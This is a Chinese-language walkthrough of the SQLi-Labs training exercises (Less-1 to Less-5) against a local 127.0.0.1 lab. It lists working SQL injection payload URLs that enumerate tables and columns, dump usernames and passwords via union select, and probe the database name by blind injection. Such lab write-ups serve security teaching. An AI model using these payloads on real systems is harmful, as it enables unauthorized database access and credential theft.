SQLi-Labs--Page-1 (Basic Injections)

SQL注入流程：

1. 判断是否存在注入点
2. 判断查询字段数（order by）
3. 判断回显点（union select）
4. 查询（当前）数据库
5. 查询数据库中的表
6. 查询字段名
7. 获取表中数据

Less-1：单引号闭合(字符型)

单引号闭合，进行注释，页面回显正常

and 1=1/and 1=2判断注入点

判断字段数order by

union select联合查询判断回显点

查询数据库，当前用户

查询数据表
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- qwe

查询users表中字段
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' -- qwe

获取字段数据
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,username,password from users limit 1,1 -- qwe

Less2：数字型

判断存在注入

后续操作与Less-1相同，不在叙述。

Less-3：单引号+括号

单引号和括号闭合，注释，页面回显正常

and 1=1/and 1=2判断注入点，存在注入

Less4：双引号+括号

双引号+口号闭合，注释，页面回显正常。

判断注入点

Less5：单引号（盲注）

单引号闭合，注释，根据页面返回正确与否，判断注入点。

判断数据库名的长度,页面返回正常，数据库名长度为8
http://127.0.0.1/sqli/Less-5/?id=1' and length(database())=8 -- qwe